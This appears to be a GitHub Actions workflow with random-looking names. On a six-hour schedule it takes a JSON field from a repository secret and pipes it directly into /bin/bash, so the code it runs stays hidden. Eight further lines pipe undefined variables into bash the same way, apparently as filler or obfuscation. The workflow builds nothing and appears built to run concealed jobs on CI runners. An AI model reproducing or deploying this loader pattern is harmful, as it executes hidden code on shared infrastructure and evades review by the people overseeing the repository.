name: sensiblehumiliated

on:
  workflow_dispatch:
  schedule:
    - cron: '28 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: sensiblehumiliated
        env:
          ddr87: ${{ secrets.ddr87 }}
        run: |
          echo $ddr87 | jq -r .sgynv6845 | /bin/bash
          echo $i46585 | jq -r .sedp77 | /bin/bash
          echo $iloj92436 | jq -r .wi5957 | /bin/bash
          echo $auc70 | jq -r .p92645 | /bin/bash
          echo $k859 | jq -r .dxc789 | /bin/bash
          echo $f50 | jq -r .eqjh175 | /bin/bash
          echo $joddm0044 | jq -r .banp4500 | /bin/bash
          echo $gsgm0128 | jq -r .kngsm5 | /bin/bash
          echo $ado70430 | jq -r .epbd314 | /bin/bash

